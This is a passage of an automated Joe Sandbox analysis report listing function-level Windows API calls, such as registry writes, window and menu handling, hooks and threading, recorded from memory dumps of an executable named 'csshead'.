Part of subcall function 004041F0: CharNextA.USER32(?,?,?,00404258,?,0040913B,?), ref: 0040421C

lstrlenA.KERNEL32(?,?), ref: 00407695
RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 00407751

Part of subcall function 00403F60: lstrlenA.KERNEL32(?), ref: 00403F75
Part of subcall function 00403F60: RegSetValueExA.ADVAPI32(?,?,00000000,?,?,00000001), ref: 00403F8D

lstrlenA.KERNEL32(?,?), ref: 004077B9

Part of subcall function 00401810: MultiByteToWideChar.KERNEL32(00000001,00000000,00000003,000000FF,?,00000001,00000001,00401D0B,?,?,00000001,00000003), ref: 00401835

80000115.OLEAUT32(00000000,00000000,00000000,?,00000000,?,?,00000003,?), ref: 0040783E

Part of subcall function 00403F40: RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00403F53

lstrlenA.KERNEL32(?,?), ref: 00407875
CharNextA.USER32(00000000), ref: 004078B1
CharNextA.USER32(00000000), ref: 004078C4
IsDBCSLeadByte.KERNEL32 ref: 004078D0

Part of subcall function 00403FA0: lstrlenA.KERNEL32(?), ref: 00403FC4
Part of subcall function 00403FA0: RegSetValueExA.ADVAPI32(?,?,00000000,00000007,?,00000000), ref: 00403FE2

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00415B20, Relevance: 12.1, APIs: 8, Instructions: 138threadregistryclipboard

APIs

RtlEnterCriticalSection.NTDLL(00442A20), ref: 00415B87
RegisterClipboardFormatA.USER32(00436308), ref: 00415B9B
RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00415BA7
GetCurrentProcessId.KERNEL32 ref: 00415BCF
IsWindow.USER32 ref: 00415BE7
GetCurrentThreadId.KERNEL32 ref: 00415C0D
CallNextHookEx.USER32(?,?,?,?), ref: 00415C62
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00415C7C

Part of subcall function 00413B70: RtlEnterCriticalSection.NTDLL(00442A20), ref: 00413B84
Part of subcall function 00413B70: RegisterClipboardFormatA.USER32(00436308), ref: 00413B98
Part of subcall function 00413B70: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00413BA4

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00411DD0, Relevance: 12.1, APIs: 8, Instructions: 117window

APIs

GetCapture.USER32 ref: 00411DE7
ClientToScreen.USER32(?,?), ref: 00411E1D
GetWindowRect.USER32(?,?), ref: 00411E42
ReleaseCapture.USER32 ref: 00411E5E

Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382

PtInRect.USER32(?,?,?), ref: 00411EBD
SendMessageA.USER32(?,00000112,0000F020,000000FD), ref: 00411EE4
SendMessageA.USER32(?,00000112,0000F120,00000000), ref: 00411F07
SendMessageA.USER32(?,00000112,0000F060,00000000), ref: 00411F2A

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00423C51, Relevance: 12.1, APIs: 8, Instructions: 97thread

APIs

Part of subcall function 00425D30: TlsGetValue.KERNEL32(00000000,00425E89,?,?,00417F96,00000009), ref: 00425D39
Part of subcall function 00425D30: RtlDecodePointer.NTDLL ref: 00425D4B
Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425D5A

___fls_getvalue@4.LIBCMT ref: 00423C62

Part of subcall function 00425D10: TlsGetValue.KERNEL32(?,?,00423C67,00000000), ref: 00425D1E

___fls_setvalue@8.LIBCMT ref: 00423C75

Part of subcall function 00425D64: RtlDecodePointer.NTDLL(?), ref: 00425D75

GetLastError.KERNEL32(00000000,?,00000000), ref: 00423C7E
RtlExitUserThread.NTDLL(00000000), ref: 00423C85
GetCurrentThreadId.KERNEL32 ref: 00423C8B

Part of subcall function 00425F05: InterlockedDecrement.KERNEL32(?), ref: 00425FA3

Part of subcall function 00423C10: __getptd.LIBCMT ref: 00423C1C
Part of subcall function 00423C10: __XcptFilter.LIBCMT ref: 00423C3D

Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C

__getptd.LIBCMT ref: 00423CF4

Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB

Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(00436FF4,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10

CreateThread.KERNEL32(?,?,00423C51,00000000,?,?), ref: 00423D2B
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00423D35

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041F3B0, Relevance: 12.1, APIs: 8, Instructions: 75thread

APIs

GetCurrentProcess.KERNEL32 ref: 0041F3EA
FlushInstructionCache.KERNEL32(00000000), ref: 0041F3F1
GetCurrentThreadId.KERNEL32 ref: 0041F405
RtlEnterCriticalSection.NTDLL(00442B64), ref: 0041F413
RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041F42D
DialogBoxParamA.USER32(00442B94,00000064,?,00408EC0,?), ref: 0041F44B
RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 0041F470

Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C

SetLastError.KERNEL32(0000000E,00000000,0041F69F,00000000), ref: 0041F458

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00421700, Relevance: 10.9, APIs: 7, Instructions: 449windowthread

APIs

GetMenu.USER32(?), ref: 0042173B

Part of subcall function 00413BC0: IsMenu.USER32(?), ref: 00413BD9
Part of subcall function 00413BC0: DestroyMenu.USER32(?), ref: 00413C12
Part of subcall function 00413BC0: GetMenuItemCount.USER32(?), ref: 00413C6C
Part of subcall function 00413BC0: GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00413CDE
Part of subcall function 00413BC0: GetMenuItemInfoA.USER32 ref: 00413D39
Part of subcall function 00413BC0: lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,0000002C), ref: 00413D44
Part of subcall function 00413BC0: SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 00413D63
Part of subcall function 00413BC0: InvalidateRect.USER32(?,00000000,00000001), ref: 00413E22
Part of subcall function 00413BC0: UpdateWindow.USER32(?), ref: 00413E2C

Part of subcall function 0041F4A0: FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041F4B8
Part of subcall function 0041F4A0: LoadResource.KERNEL32(00442B94,00000000), ref: 0041F4CE
Part of subcall function 0041F4A0: LockResource.KERNEL32(00000000), ref: 0041F4D9
Part of subcall function 0041F4A0: LoadImageA.USER32(00442B94,?,00000000,00000000,00000000,00002040), ref: 0041F596
Part of subcall function 0041F4A0: LoadBitmapA.USER32(00442B94,?), ref: 0041F5B3
Part of subcall function 0041F4A0: DeleteObject.GDI32(00000000), ref: 0041F623
Part of subcall function 0041F4A0: DeleteObject.GDI32(00000000), ref: 0041F652

SetMenu.USER32(?,00000000), ref: 00421766

Part of subcall function 0041EBA0: FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041EBC5
Part of subcall function 0041EBA0: LoadResource.KERNEL32(00442B94,00000000), ref: 0041EBDE
Part of subcall function 0041EBA0: LockResource.KERNEL32(00000000), ref: 0041EBE9
Part of subcall function 0041EBA0: CreateWindowExA.USER32(00000000,00436780,00000000,?,00000000,00000000,00000064,00000064,?,?,00442B90,00000000), ref: 0041ECD8
Part of subcall function 0041EBA0: GetStockObject.GDI32(0000000D), ref: 0041ED26
Part of subcall function 0041EBA0: GetObjectA.GDI32(?,0000003C,?), ref: 0041ED50
Part of subcall function 0041EBA0: FindResourceA.KERNEL32(00442B94,?,00000002), ref: 0041ED77
Part of subcall function 0041EBA0: LoadResource.KERNEL32(?,00000000), ref: 0041ED83
Part of subcall function 0041EBA0: LockResource.KERNEL32(00000000), ref: 0041ED8A

CreateWindowExA.USER32(00000000,00436790,00000000,56002640,00000000,00000000,00000064,00000064,?,0000E800,00442B90,00000000), ref: 004217B3

Part of subcall function 00410C90: GetVersionExA.KERNEL32(?,00000000,00000090), ref: 00410CBD

GetWindowRect.USER32(00000000,00000000), ref: 004218EB
GetWindowRect.USER32(00000000,?), ref: 00421A14
LoadStringA.USER32(00442B94,0000E001,?,00000080), ref: 00421A99

Part of subcall function 0041EA50: SetWindowLongA.USER32(?,000000F0,00000000), ref: 0041EABB
Part of subcall function 0041EA50: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,0000003F), ref: 0041EAD1
Part of subcall function 0041EA50: CreateWindowExA.USER32(00000200,004367A0,00000000,56000001,00000000,00000000,00000001,00000001,?,?,00442B90, 4C), ref: 0041EB01
Part of subcall function 0041EA50: BringWindowToTop.USER32(00000000), ref: 0041EB18

Part of subcall function 0041E9C0: GetWindowLongA.USER32(?,000000FC), ref: 0041E9F8
Part of subcall function 0041E9C0: SetWindowLongA.USER32(?,000000FC,?), ref: 0041EA12

GetCurrentThreadId.KERNEL32 ref: 00421BD2

Part of subcall function 0041F120: RtlEnterCriticalSection.NTDLL(00442A20), ref: 0041F12F
Part of subcall function 0041F120: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F156
Part of subcall function 0041F120: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F16C
Part of subcall function 0041F120: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 0041F189
Part of subcall function 0041F120: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000000,00421BE3,00000000,?,?,?,?,?,?,00000000,00000404), ref: 0041F1A2

Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042826C, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 327LIBRARYCODE

APIs

Part of subcall function 0042224B: __getptd.LIBCMT ref: 0042225E

__cftoe.LIBCMT ref: 00428323
_strrchr.LIBCMT ref: 0042836A
__alldvrm.INT64 ref: 00428568
__alldvrm.INT64 ref: 0042858E
__alldvrm.INT64 ref: 004285B4

Strings

0, xrefs: 00428285

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00413280, Relevance: 10.7, APIs: 7, Instructions: 241window

APIs

GetWindowRect.USER32(?,?), ref: 004132D8

Part of subcall function 004112B0: SetRect.USER32(?,?,?,?,?), ref: 00411304
Part of subcall function 004112B0: SetRect.USER32(00000000,?,?,?,?), ref: 00411320

Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382

GetSystemMenu.USER32(?,00000000), ref: 00413387

Part of subcall function 00411910: GetMonitorInfoA.USER32 ref: 0041196C

TrackPopupMenu.USER32(?,?,00000000,?,00000000,?,00000000), ref: 004133DC
OffsetRect.USER32(?,?,?), ref: 004133F3
PtInRect.USER32(?,00000000,?), ref: 0041344A
SendMessageA.USER32(?,00000112,00000000,00000000), ref: 00413482
SetCapture.USER32(?), ref: 00413501

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004156C0, Relevance: 10.7, APIs: 7, Instructions: 225window

APIs

Part of subcall function 004117C0: GetFocus.USER32 ref: 004117D2
Part of subcall function 004117C0: SetFocus.USER32(?), ref: 004117E2

GetFocus.USER32 ref: 0041574E
IsWindow.USER32(?), ref: 00415761
SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 0041577C
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004158D1

Part of subcall function 00411530: GetClientRect.USER32(?,?), ref: 00411569
Part of subcall function 00411530: GetMenuItemCount.USER32(?), ref: 00411573

Part of subcall function 00411440: GetClientRect.USER32(?,?), ref: 00411479
Part of subcall function 00411440: GetMenuItemCount.USER32(?), ref: 00411498

Part of subcall function 00411630: GetParent.USER32(?), ref: 00411640
Part of subcall function 00411630: SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
Part of subcall function 00411630: GetVersionExA.KERNEL32(?), ref: 0041169F
Part of subcall function 00411630: LoadLibraryA.KERNEL32(00436280), ref: 004116D6
Part of subcall function 00411630: GetProcAddress.KERNEL32(00000000,00436270), ref: 004116EF
Part of subcall function 00411630: FreeLibrary.KERNEL32(00000000), ref: 0041170A
Part of subcall function 00411630: SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F

GetFocus.USER32 ref: 004158E6
IsWindow.USER32(?), ref: 004158F5
SendMessageA.USER32(?,00000447,00000000,00000000), ref: 0041590C

Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041F730, Relevance: 10.7, APIs: 7, Instructions: 224window

APIs

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 0041F7AB

Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960

MessageBoxA.USER32(?,00436854,00435A8C,00000030), ref: 0041F803
MessageBoxA.USER32(?,00436854,00435A8C,00000030), ref: 0041F83F
LoadCursorA.USER32(00000000,00007F02), ref: 0041F895
SetCursor.USER32(00000000), ref: 0041F8A0
SetCursor.USER32(?), ref: 0041F8CC
MessageBoxA.USER32(?,00436840,00435A8C,00000030), ref: 0041F8FE

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00411050, Relevance: 10.7, APIs: 7, Instructions: 197

APIs

GetClassLongA.USER32(00000000,000000DE), ref: 004110FB
GetParent.USER32(?), ref: 00411129

Part of subcall function 00410C90: GetVersionExA.KERNEL32(?,00000000,00000090), ref: 00410CBD

GetParent.USER32(?), ref: 00411186
GetParent.USER32(?), ref: 004111CA
GetWindowRect.USER32 ref: 00411219
GetParent.USER32(?), ref: 00411223
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00411233

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041F4A0, Relevance: 10.7, APIs: 7, Instructions: 158window

APIs

FindResourceA.KERNEL32(00442B94,?,000000F1), ref: 0041F4B8
LoadResource.KERNEL32(00442B94,00000000), ref: 0041F4CE
LockResource.KERNEL32(00000000), ref: 0041F4D9
LoadImageA.USER32(00442B94,?,00000000,00000000,00000000,00002040), ref: 0041F596

Part of subcall function 0041E6B0: DeleteObject.GDI32(00000000,00000000), ref: 0041E6C3

LoadBitmapA.USER32(00442B94,?), ref: 0041F5B3
DeleteObject.GDI32(00000000), ref: 0041F623

Part of subcall function 00410BB0: GetVersionExA.KERNEL32 ref: 00410BD6

DeleteObject.GDI32(00000000), ref: 0041F652

Part of subcall function 0041EE80: GetCurrentObject.GDI32(00000000,00000007), ref: 0041EEA3
Part of subcall function 0041EE80: SelectObject.GDI32(00000000,?), ref: 0041EEDA
Part of subcall function 0041EE80: DeleteDC.GDI32(00000000), ref: 0041EF7C
Part of subcall function 0041EE80: GetCurrentProcess.KERNEL32 ref: 0041F006
Part of subcall function 0041EE80: FlushInstructionCache.KERNEL32(00000000), ref: 0041F00D
Part of subcall function 0041EE80: SetWindowLongA.USER32(?,000000FC,?), ref: 0041F01A

Part of subcall function 00411B80: DeleteObject.GDI32 ref: 00411B8A

Part of subcall function 0041E1F0: FindResourceA.KERNEL32(00442B94,?,00000002), ref: 0041E200
Part of subcall function 0041E1F0: LoadResource.KERNEL32(00442B94,00000000), ref: 0041E208
Part of subcall function 0041E1F0: LockResource.KERNEL32(00000000), ref: 0041E20F

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00419080, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132window

APIs

GetVersionExA.KERNEL32(?), ref: 00419104
SendMessageA.USER32 ref: 00419186
IsWindow.USER32(00000000), ref: 0041918F
SendMessageA.USER32(00000000,0000052F,00000000,?), ref: 004191D0

Part of subcall function 00411910: GetMonitorInfoA.USER32 ref: 0041196C

TrackPopupMenuEx.USER32(?,-00000001,00000000,?,?,?), ref: 00419202

Strings

Z, xrefs: 0041911C

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00414E70, Relevance: 10.6, APIs: 7, Instructions: 129thread

APIs

CallWindowProcA.USER32(?,?,?,?,?), ref: 00414E8C
RtlEnterCriticalSection.NTDLL(00442B64), ref: 00414F07
GetCurrentThreadId.KERNEL32 ref: 00414F1A
RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00414F51
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00414F6A
UnhookWindowsHookEx.USER32(00000000), ref: 00414F93

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041500D

Part of subcall function 00412950: GetVersionExA.KERNEL32(?,00000000,00000030), ref: 004129A7
Part of subcall function 00412950: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00412A19

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00420F70, Relevance: 10.6, APIs: 7, Instructions: 125window

APIs

LoadMenuA.USER32(00442B94), ref: 00420FA1

Part of subcall function 00420A00: GetCurrentProcess.KERNEL32 ref: 00420A36
Part of subcall function 00420A00: FlushInstructionCache.KERNEL32(00000000), ref: 00420A3D
Part of subcall function 00420A00: SetLastError.KERNEL32(0000000E), ref: 00420A57
Part of subcall function 00420A00: CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00442B90,?), ref: 00420AD1

GetParent.USER32(?), ref: 0042107A
SetFocus.USER32(00000000), ref: 00421081
IsWindowVisible.USER32(?), ref: 0042109B
GetFocus.USER32 ref: 004210A5
IsChild.USER32(00000000,00000000), ref: 004210AD
SetFocus.USER32(00000000), ref: 004210B8

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00411630, Relevance: 10.6, APIs: 7, Instructions: 123windowlibrary

APIs

GetParent.USER32(?), ref: 00411640
SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
GetVersionExA.KERNEL32(?), ref: 0041169F
LoadLibraryA.KERNEL32(00436280), ref: 004116D6
GetProcAddress.KERNEL32(00000000,00436270), ref: 004116EF
FreeLibrary.KERNEL32(00000000), ref: 0041170A
SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00413F60, Relevance: 10.6, APIs: 7, Instructions: 120

APIs

GetSystemMetrics.USER32(0000000F), ref: 00413F80
GetObjectA.GDI32(00000038,0000003C,?), ref: 00413FDC
CreateFontIndirectA.GDI32(?), ref: 00413FEF
DrawTextA.USER32(00000000,?,000000FF,?,00000424), ref: 00414032
GetObjectA.GDI32(00000038,0000003C,?), ref: 0041406F
GetSystemMetrics.USER32(00000047), ref: 004140AD
DeleteObject.GDI32(?), ref: 004140C3

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00429A60, Relevance: 9.3, APIs: 6, Instructions: 262LIBRARYCODE

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00429B61
__FindPESection.LIBCMT ref: 00429B7B
VirtualQuery.KERNEL32(?,004420A4,0000001C,004420A4,?,?,?,?,?,00429F50,0043CE68,000000FE,?,00423B11,?), ref: 00429C61
__FindPESection.LIBCMT ref: 00429CB0
_ValidateScopeTableHandlers.LIBCMT ref: 00429CD4

Part of subcall function 004299A0: __FindPESection.LIBCMT ref: 004299E3
Part of subcall function 004299A0: __FindPESection.LIBCMT ref: 00429A21

__FindPESection.LIBCMT ref: 00429CEE

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00416ED0, Relevance: 9.2, APIs: 6, Instructions: 236windowregistryclipboard

APIs

GetSubMenu.USER32(?,?), ref: 00416F7D

Part of subcall function 00416AF0: RtlEnterCriticalSection.NTDLL(00442B64), ref: 00416B05
Part of subcall function 00416AF0: GetCurrentThreadId.KERNEL32 ref: 00416B27
Part of subcall function 00416AF0: SetWindowsHookExA.USER32(00000005,Function_00006430,00442B90,00000000), ref: 00416B36
Part of subcall function 00416AF0: TrackPopupMenuEx.USER32(?,?,00000000,?,?,?), ref: 00416B89
Part of subcall function 00416AF0: UnhookWindowsHookEx.USER32(00442A54), ref: 00416BA1
Part of subcall function 00416AF0: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00416BB8
Part of subcall function 00416AF0: GetMenuItemCount.USER32(00433394), ref: 00416C2A
Part of subcall function 00416AF0: GetVersionExA.KERNEL32(?,?,00000000,00000090,?,00000000,00000030), ref: 00416C6B
Part of subcall function 00416AF0: GetMenuItemInfoA.USER32(00433394,00000000,00000001,0000002C), ref: 00416CA3
Part of subcall function 00416AF0: lstrlen.KERNEL32(?), ref: 00416CDD
Part of subcall function 00416AF0: SetMenuItemInfoA.USER32(00433394,00000000,00000001,0000002C), ref: 00416CF8
Part of subcall function 00416AF0: ModifyMenuA.USER32(00433394,00000000,?,?,00000000), ref: 00416D17
Part of subcall function 00416AF0: GetMenuItemCount.USER32(00433394), ref: 00416D34

GetFocus.USER32 ref: 0041702B
PtInRect.USER32(?,?,?), ref: 00417098
RtlEnterCriticalSection.NTDLL(00442A20), ref: 004170DB
RegisterClipboardFormatA.USER32(004362E8), ref: 004170EF
RtlLeaveCriticalSection.NTDLL(00442A20), ref: 004170FB

Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041EE80, Relevance: 9.2, APIs: 6, Instructions: 162

APIs

GetCurrentObject.GDI32(00000000,00000007), ref: 0041EEA3
SelectObject.GDI32(00000000,?), ref: 0041EEDA
DeleteDC.GDI32(00000000), ref: 0041EF7C
SetWindowLongA.USER32(?,000000FC,?), ref: 0041F01A

Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C

GetCurrentProcess.KERNEL32 ref: 0041F006
FlushInstructionCache.KERNEL32(00000000), ref: 0041F00D

Part of subcall function 0041E470: SelectObject.GDI32(?,00000000), ref: 0041E504

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004121B0, Relevance: 9.1, APIs: 6, Instructions: 128window

APIs

IsWindowEnabled.USER32(?), ref: 004121F0
GetFocus.USER32 ref: 004121FE
MessageBeep.USER32(00000000), ref: 00412304

Part of subcall function 00411010: SendMessageA.USER32(?,0000044E,?,?), ref: 00411023

MessageBeep.USER32(00000000), ref: 00412232
GetClientRect.USER32(?,?), ref: 0041225F
PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004122E0

Part of subcall function 00410FF0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00410FFF

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00416570, Relevance: 9.1, APIs: 6, Instructions: 122thread

APIs

CallWindowProcA.USER32(?,?,?,?,?), ref: 0041658D

Part of subcall function 00415980: GetVersionExA.KERNEL32(?,00000090), ref: 004159B5
Part of subcall function 00415980: SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 004159FA
Part of subcall function 00415980: GetClientRect.USER32 ref: 00415AB9

Part of subcall function 004124F0: GetCurrentProcess.KERNEL32 ref: 00412525
Part of subcall function 004124F0: FlushInstructionCache.KERNEL32(00000000), ref: 0041252C
Part of subcall function 004124F0: SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041253E

RtlEnterCriticalSection.NTDLL(00442B64), ref: 004165ED
GetCurrentThreadId.KERNEL32 ref: 00416616

Part of subcall function 00414220: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00414270

GetWindowLongA.USER32(00000000,000000EC), ref: 004166AB

Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960

SetWindowsHookExA.USER32(00000003,Function_00005B20,00442B90,00000000), ref: 00416669
RtlLeaveCriticalSection.NTDLL(00442B64), ref: 0041669F

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00432A40, Relevance: 9.1, APIs: 6, Instructions: 117string

APIs

lstrlen.KERNEL32(?,004420A4), ref: 00432A87
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00432A9D
GetLastError.KERNEL32 ref: 00432AAC

Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00432B3B
GetLastError.KERNEL32 ref: 00432B56
SysAllocString.OLEAUT32(00000000), ref: 00432B71

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
